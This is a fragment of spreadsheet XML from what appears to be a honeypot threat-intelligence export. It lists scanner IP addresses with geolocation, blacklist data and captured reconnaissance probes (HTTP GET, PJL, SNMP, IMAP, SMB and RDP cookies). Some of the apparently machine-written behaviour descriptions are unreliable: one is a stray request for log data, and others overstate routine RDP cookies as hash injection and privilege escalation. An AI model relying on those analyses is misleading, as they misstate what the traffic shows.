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Users\Chinmay\Downloads\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{AE19FC4F-DFCE-4681-BC8D-21CBF9F26721}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="19440" windowHeight="14880" activeTab="2" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet2" sheetId="2" r:id="rId1"/>
    <sheet name="Sheet3" sheetId="3" r:id="rId2"/>
    <sheet name="Sheet1" sheetId="1" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">Sheet1!$A$1:$BL$3882</definedName>
  </definedNames>
  <calcPr calcId="0"/>
  <pivotCaches>
    <pivotCache cacheId="7" r:id="rId4"/>
  </pivotCaches>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="226043" uniqueCount="28107">
  <si>
    <t>md5</t>
  </si>
  <si>
    <t>indicator_ip</t>
  </si>
  <si>
    <t>indicator_domain</t>
  </si>
  <si>
    <t>indicator_url</t>
  </si>
  <si>
    <t>reported_at</t>
  </si>
  <si>
    <t>first_at</t>
  </si>
  <si>
    <t>last_at</t>
  </si>
  <si>
    <t>count</t>
  </si>
  <si>
    <t>tags</t>
  </si>
  <si>
    <t>sources</t>
  </si>
  <si>
    <t>confidence</t>
  </si>
  <si>
    <t>provider</t>
  </si>
  <si>
    <t>Attacked_Port</t>
  </si>
  <si>
    <t>IP_blacklist</t>
  </si>
  <si>
    <t>IP_blacklist_name</t>
  </si>
  <si>
    <t>IP_blacklist_count</t>
  </si>
  <si>
    <t>isCrawler</t>
  </si>
  <si>
    <t>isProxy</t>
  </si>
  <si>
    <t>ProxyType</t>
  </si>
  <si>
    <t>threatLevel</t>
  </si>
  <si>
    <t>threatDetails</t>
  </si>
  <si>
    <t>continentCode</t>
  </si>
  <si>
    <t>continentName</t>
  </si>
  <si>
    <t>countryCode</t>
  </si>
  <si>
    <t>countryName</t>
  </si>
  <si>
    <t>stateProvCode</t>
  </si>
  <si>
    <t>stateProv</t>
  </si>
  <si>
    <t>district</t>
  </si>
  <si>
    <t>city</t>
  </si>
  <si>
    <t>geonameId</t>
  </si>
  <si>
    <t>zipCode</t>
  </si>
  <si>
    <t>latitude</t>
  </si>
  <si>
    <t>longitude</t>
  </si>
  <si>
    <t>asNumber</t>
  </si>
  <si>
    <t>asName</t>
  </si>
  <si>
    <t>isp</t>
  </si>
  <si>
    <t>usageTypeconsumer</t>
  </si>
  <si>
    <t>organization</t>
  </si>
  <si>
    <t>IP_Created_date</t>
  </si>
  <si>
    <t>IP_Name</t>
  </si>
  <si>
    <t>IP_Updated_date</t>
  </si>
  <si>
    <t>action</t>
  </si>
  <si>
    <t>Brief_Info_data</t>
  </si>
  <si>
    <t>method</t>
  </si>
  <si>
    <t>command</t>
  </si>
  <si>
    <t>argument</t>
  </si>
  <si>
    <t>content</t>
  </si>
  <si>
    <t>sender</t>
  </si>
  <si>
    <t>Domain_Creation_Date</t>
  </si>
  <si>
    <t>Domain_Exp_Date</t>
  </si>
  <si>
    <t>Domain_Last_Update_date</t>
  </si>
  <si>
    <t>Domain_Name_Server</t>
  </si>
  <si>
    <t>Domain_Registrar</t>
  </si>
  <si>
    <t>Domain_Status</t>
  </si>
  <si>
    <t>Domain_Registrant_Name</t>
  </si>
  <si>
    <t>Domain_Registrant_Email</t>
  </si>
  <si>
    <t>Domain_Registrant_Contact</t>
  </si>
  <si>
    <t>Domain_Registrant_Address</t>
  </si>
  <si>
    <t>ipv6</t>
  </si>
  <si>
    <t>comment</t>
  </si>
  <si>
    <t>confidence_3rd_party</t>
  </si>
  <si>
    <t>behaviour_severity</t>
  </si>
  <si>
    <t>behaviour_desc</t>
  </si>
  <si>
    <t>behaviour_attack_indicator</t>
  </si>
  <si>
    <t>7113e49569e9289cb1b04d8a5b0948a7</t>
  </si>
  <si>
    <t>45.156.128.81</t>
  </si>
  <si>
    <t>sh-ams-nl-gp1-wk139a.internet-census.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA</t>
  </si>
  <si>
    <t>SQTK_GTDN</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation</t>
  </si>
  <si>
    <t>low</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_ORACLE_H2&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_REDIS_H43&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_IRC_H17&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_SIP_H24&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_MYSQL_H24&amp;&amp;SMA-LAB_LDAP_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;21&amp;&amp;110&amp;&amp;5432&amp;&amp;9100&amp;&amp;1433&amp;&amp;6379&amp;&amp;18757&amp;&amp;1521&amp;&amp;1433&amp;&amp;6379&amp;&amp;321&amp;&amp;443&amp;&amp;445&amp;&amp;3306&amp;&amp;NA&amp;&amp;3306&amp;&amp;445&amp;&amp;3501&amp;&amp;6667&amp;&amp;5900&amp;&amp;161&amp;&amp;23&amp;&amp;143&amp;&amp;21432&amp;&amp;13471</t>
  </si>
  <si>
    <t>True</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>False</t>
  </si>
  <si>
    <t>Untrusted Traffic</t>
  </si>
  <si>
    <t>EU</t>
  </si>
  <si>
    <t>Europe</t>
  </si>
  <si>
    <t>NL</t>
  </si>
  <si>
    <t>The Netherlands</t>
  </si>
  <si>
    <t>NH</t>
  </si>
  <si>
    <t>North Holland</t>
  </si>
  <si>
    <t>Gemeente Amsterdam</t>
  </si>
  <si>
    <t>Amsterdam</t>
  </si>
  <si>
    <t>2759794</t>
  </si>
  <si>
    <t>1012</t>
  </si>
  <si>
    <t>52.3676</t>
  </si>
  <si>
    <t>4.90414</t>
  </si>
  <si>
    <t>211680</t>
  </si>
  <si>
    <t>NSEC - Sistemas Informaticos, S.A.</t>
  </si>
  <si>
    <t>business</t>
  </si>
  <si>
    <t>Inap AMS</t>
  </si>
  <si>
    <t>2019-09-20</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;command&amp;&amp;NA&amp;&amp;login&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 193.57.138.110:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000D_
_x000D_
'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JCDL0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'GCLF0'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PEPI0'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 156.244.8.69:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.128.81;rport=53266'}}&amp;&amp;{Data_IRC:{'command': 'SSH-2.0-GO', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'CLNP0'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.128.81;rport=56867'}}</t>
  </si>
  <si>
    <t>::ffff:2d9c:8051</t>
  </si>
  <si>
    <t>C-I_D</t>
  </si>
  <si>
    <t>high&amp;&amp;low</t>
  </si>
  <si>
    <t>Low&amp;&amp;Medium</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze or describe malicious activity. &amp;&amp; No available log data provided, cannot analyze activity. &amp;&amp; There is insufficient information to analyze possible malicious activity. &amp;&amp; A GET request was made to the root directory of the system with an HTTP version of 1.1, indicating a potential scanning or reconnaissance attempt. 
The attacker may be trying to identify available services and directories on the system.
This could be an initial step in a more malicious attack. &amp;&amp; Possible malicious activity involves an unauthorized GET request to the root directory of the system, indicating potential reconnaissance or exploitation attempts. This could be a preparatory step for further attacks. The request appears to be coming from an unknown or untrusted source.</t>
  </si>
  <si>
    <t>I need some log data to analyze! Please provide the log data for me to identify the types of attacks. &amp;&amp; Port Scan &amp;&amp; Web Scanning</t>
  </si>
  <si>
    <t>6768678ca9348cde4ce0f42f643b42ca</t>
  </si>
  <si>
    <t>38.25.176.46</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>high</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>1433</t>
  </si>
  <si>
    <t>SA</t>
  </si>
  <si>
    <t>South America</t>
  </si>
  <si>
    <t>VE</t>
  </si>
  <si>
    <t>Venezuela</t>
  </si>
  <si>
    <t>V</t>
  </si>
  <si>
    <t>Zulia</t>
  </si>
  <si>
    <t>Maracaibo Municipality</t>
  </si>
  <si>
    <t>Maracaibo</t>
  </si>
  <si>
    <t>3633009</t>
  </si>
  <si>
    <t>10.6666</t>
  </si>
  <si>
    <t>-71.6124</t>
  </si>
  <si>
    <t>61461</t>
  </si>
  <si>
    <t>Airtek Solutions C.A.</t>
  </si>
  <si>
    <t>Corporacion Matrix TV, C.A.</t>
  </si>
  <si>
    <t>1991-04-16</t>
  </si>
  <si>
    <t>COGENT-A</t>
  </si>
  <si>
    <t>2023-10-11</t>
  </si>
  <si>
    <t>connection&amp;&amp;login</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:2619:b02e</t>
  </si>
  <si>
    <t>C-I</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>044934b28b588612f403e2bf36a36259</t>
  </si>
  <si>
    <t>117.248.5.185</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23</t>
  </si>
  <si>
    <t>AS</t>
  </si>
  <si>
    <t>Asia</t>
  </si>
  <si>
    <t>IN</t>
  </si>
  <si>
    <t>India</t>
  </si>
  <si>
    <t>KA</t>
  </si>
  <si>
    <t>Karnataka</t>
  </si>
  <si>
    <t>Bengaluru Urban</t>
  </si>
  <si>
    <t>Bengaluru</t>
  </si>
  <si>
    <t>1277333</t>
  </si>
  <si>
    <t>560056</t>
  </si>
  <si>
    <t>12.9716</t>
  </si>
  <si>
    <t>77.5946</t>
  </si>
  <si>
    <t>9829</t>
  </si>
  <si>
    <t>BSNL-NIB</t>
  </si>
  <si>
    <t>BSNL Internet</t>
  </si>
  <si>
    <t>consumer</t>
  </si>
  <si>
    <t>connection</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:75f8:5b9</t>
  </si>
  <si>
    <t>76103fa0f15359bfe2b4f91fc47aa126</t>
  </si>
  <si>
    <t>180.183.247.8</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTPS_H42&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;389&amp;&amp;6688&amp;&amp;443&amp;&amp;20934&amp;&amp;1433</t>
  </si>
  <si>
    <t>TH</t>
  </si>
  <si>
    <t>Thailand</t>
  </si>
  <si>
    <t>10</t>
  </si>
  <si>
    <t>Bangkok</t>
  </si>
  <si>
    <t>Bang Khun Thian</t>
  </si>
  <si>
    <t>1619485</t>
  </si>
  <si>
    <t>13.663</t>
  </si>
  <si>
    <t>100.434</t>
  </si>
  <si>
    <t>45758</t>
  </si>
  <si>
    <t>Triple T Broadband Public Company Limited</t>
  </si>
  <si>
    <t>residential</t>
  </si>
  <si>
    <t>2009-09-16</t>
  </si>
  <si>
    <t>TTBP-TH</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>login&amp;&amp;connection</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:b4b7:f708</t>
  </si>
  <si>
    <t>None&amp;&amp;C-I</t>
  </si>
  <si>
    <t>f0240c056c6f650922aed9d5c3f50fcc</t>
  </si>
  <si>
    <t>147.185.132.249</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_HTTP_H27&amp;&amp;SMA-LAB_IRC_H14&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_SOCKS5_H38&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_RDP_H15&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_POP3_H28&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_MSSQL_H21&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_RDP_H25&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_POP3_H24&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_NTP_H30&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_PJL_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;57004&amp;&amp;3389&amp;&amp;80&amp;&amp;6427&amp;&amp;1521&amp;&amp;23&amp;&amp;3306&amp;&amp;9100&amp;&amp;1433&amp;&amp;6379&amp;&amp;6667&amp;&amp;161&amp;&amp;1080&amp;&amp;110&amp;&amp;443&amp;&amp;5432&amp;&amp;NA&amp;&amp;445&amp;&amp;389&amp;&amp;21&amp;&amp;50815&amp;&amp;55034&amp;&amp;143&amp;&amp;55709&amp;&amp;5900&amp;&amp;49626&amp;&amp;52366&amp;&amp;55562</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>North America</t>
  </si>
  <si>
    <t>US</t>
  </si>
  <si>
    <t>United States</t>
  </si>
  <si>
    <t>CA</t>
  </si>
  <si>
    <t>California</t>
  </si>
  <si>
    <t>Santa Clara</t>
  </si>
  <si>
    <t>5393015</t>
  </si>
  <si>
    <t>95054</t>
  </si>
  <si>
    <t>37.3833</t>
  </si>
  <si>
    <t>-121.983</t>
  </si>
  <si>
    <t>396982</t>
  </si>
  <si>
    <t>Google LLC</t>
  </si>
  <si>
    <t>hosting</t>
  </si>
  <si>
    <t>Palo Alto Networks, Inc</t>
  </si>
  <si>
    <t>2023-09-07</t>
  </si>
  <si>
    <t>PAN-22</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;command&amp;&amp;request&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,57974)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,57984)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,57994)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,64344)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,64350)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,64364)}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pCnaJSKzd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wwssDX'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wABQdl'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ftwdiKXfY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sCIyNL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nYVUqK'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60086)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60098)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60106)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=acOnJgDRk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XgJjUg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EdRyGp'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60574)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60590)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60592)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UDmvynDcv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DETLJl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CgCJWf'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,61432)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,61436)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,61450)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MDzdJmUiH'}}</t>
  </si>
  <si>
    <t>::ffff:93b9:84f9</t>
  </si>
  <si>
    <t>None&amp;&amp;C-I_D</t>
  </si>
  <si>
    <t>It appears that the attacker is scanning and probing various services on a network, likely for vulnerabilities or to gain unauthorized access. They are sending requests to different protocols such as DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, SIP, SMB, SMTP, SNMP, and attempting to authenticate or exploit potential weaknesses. &amp;&amp; Possible malicious activity: The system is being accessed through Remote Desktop Protocol (RDP). Attempts to establish unauthorized RDP connections may indicate hacking or malware activity. &amp;&amp; This indicates an attempt to enumerate valid accounts through brute-force RDP login attempts with the session hash likely being used for tracking legitimate or malicious users. 
The presence of a session hash suggests the attacker is attempting to maintain persistence and potentially escalate privileges within the system.
Further investigation into the source IP address and other related data would be necessary to determine the full extent of the activity. &amp;&amp; This indicates an attempt to bruteforce or crack the Remote Desktop Protocol (RDP) password, using a malicious tool that attempts to inject a known good hash as part of the authentication process. This could be an automated attack or a manual attempt by an attacker to bypass security measures. The presence of 'mstshash' suggests a Windows-based system is being targeted. &amp;&amp; The server is being targeted by an attacker attempting to exploit a potential PostgreSQL database vulnerability, possibly for unauthorized access or data theft. This could be a reconnaissance attempt to identify vulnerable systems. The goal of this activity is likely to gain unauthorized access to sensitive data. &amp;&amp; Unknown database access attempted, possibly a brute-force attack or unauthorized query execution. No valid credentials provided for Oracle database connection. Possible malicious intent 